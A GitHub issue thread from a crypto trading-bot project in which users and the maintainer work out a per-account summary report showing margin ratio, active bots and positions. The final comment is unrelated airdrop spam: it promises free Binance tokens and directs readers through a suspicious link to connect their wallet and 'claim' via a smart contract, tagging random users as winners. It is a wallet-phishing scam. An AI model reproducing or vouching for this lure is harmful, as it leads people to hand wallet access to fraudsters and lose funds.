### ISSUE TITLE
Scalability - Last line print summary

### ISSUE THREAD

**Issue by derrey** [JeeZues/TradeBot#12]
When you start to get a lot of accounts in one config file (I have one testing 11 accounts and another 2 with 2 accounts each) It is really hard to see from the print statement a summary of how each one is doing as they fly by very quickly.

Thought....

Add a summary list after the process has run that shows a list of account names and the current Margin Ratio for each. That would give a quick summary of how they are all doing.. The colours are also a good idea.

Any other ideas on how to manage and scale?

**Comment by UC-VR** [comment]
That would be great, also running 10+ accounts

Account name, Margin Balance, Margin Ration, Target Positions, Running Positions, Bots Active/Total, Status Maybe?

Status similar to: No change to positions count needed / Correct position count....

**Comment by derrey** [comment]
> That would be great, also running 10+ accounts
> 
> Account name, Margin Balance, Margin Ration, Target Positions, Running Positions, Bots Active/Total, Status Maybe?
> 
> Status similar to: No change to positions count needed / Correct position count....

That all sounds good.. as long as it fits on a 80 column line.

**Comment by JeeZues** [comment]
Have you looked at the --report option?
It generates a summary file per account that you can tail -f in a separate terminal.
I run all_subs in a script (much quicker with less API calls to 3Commas) and have different small terminals windows tailing each one of the reports from the different subs.

I'm no where close to what you guys are running, maybe when/if I ever get to that state I'll relate to the issues you are seeing.

Let me know if the above is not doing the job and maybe we can brainstorm something together.

As always, thanks for the great feed back.  I'm sure many lurkers and the community at large are benefiting for your suggestions.  Keep them coming :)

**Comment by derrey** [comment]
I will try it.. but at first glance.. I think this may work if you also created a summary .txt file that had all of them. With 20+ windows open it is hard to get an idea of how all are doing. 
With the summary, we can then see what ones are in trouble, then go and look at the one specific one. Make sure to include the account number as well as the name in the summary so that we can match the account numbers. :)

343834834 - Dave - Futures1 USDT-M - *** Margin Ratio = 2.92% *** Bots Active/Total: 0/127 (15 dns) Target(10)/Running(9)
343834835 - Dave - Futures2 USDT-M - *** Margin Ratio = 2.32% *** Bots Active/Total: 0/107 (0 dns) Target(10)/Running(9)
343834836 - Dave - Futures3 USDT-M - *** Margin Ratio = 1.92% *** Bots Active/Total: 0/127 (15 dns) Target(10)/Running(10)
.
.
.... etc
or something like that..

thoughts?

**Comment by JeeZues** [comment]
Hi @derrey,
I added a new summary option.
Please let me know if it does what you wanted.

**Comment by derrey** [comment]
> Hi @derrey,
> I added a new summary option.
> Please let me know if it does what you wanted.

Coming along nicely.. assuming that this is a text dump we don't have a way to set fixed width columns?  Depending on how the accounts are named it can mess things up for a quick review. 
Using the tail -f on the summary file.

![image](https://user-images.githubusercontent.com/5298725/118491402-f8583700-b6ec-11eb-8360-c4910682c9a8.png)

**Comment by derrey** [comment]
Also, having the account number may help when trying review the other txt files in the folder.

**Comment by JeeZues** [comment]
@derrey, I can do fixed width but like you said, it might not work for everyone based on name lengths.  What is your longest sub account name, I can set it to that as a starting point and longer ones will just overflow...
I'll also add the account number upfront as suggested...

**Comment by derrey** [comment]
you could set the name to a max of 40 and if longer than that... add ...  from CHR37 to CHR40
That way if we have longer than 40 we need to maybe rename them :)

**Comment by JeeZues** [comment]
done

**Comment by derrey** [comment]
> done

Looking good.. Thanks

**Comment by derrey** [comment]
@JeeZues I have been testing the new summary that helps ALOT.. but I noticed that it looks like it is writing the summary before it does the enable new bots. 
You can see on Rebecca's account that it started with 8 enabled.. then enabled another 10.. the summary should show 18 but still shows the original 8.

![image](https://user-images.githubusercontent.com/5298725/118687069-9b36b100-b7d2-11eb-8b2c-341ddbf688df.png)

**Comment by JeeZues** [comment]
yes, I show the state before I make any changes.  the state drives what we need to do.
Without having to pull the data again (expensive) we wouldn't know for sure what is running and what is not.  We can track what we started and check to see if they actually were started and do the math but this info will be updated the next run in 1 or less minute anyways...

**Comment by derrey** [comment]
> yes, I show the state before I make any changes. the state drives what we need to do.
> Without having to pull the data again (expensive) we wouldn't know for sure what is running and what is not. We can track 

Understood.. Just wanted to double check. It is not that big of an issue... Just wanted to point out anything I see.

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @treper, @Maurog-rgba, @wmvm0, @maxsatellite, @garyscetbon, @contact2ajay, @koke, @dongchuant, @twyfdsf, @ailinal
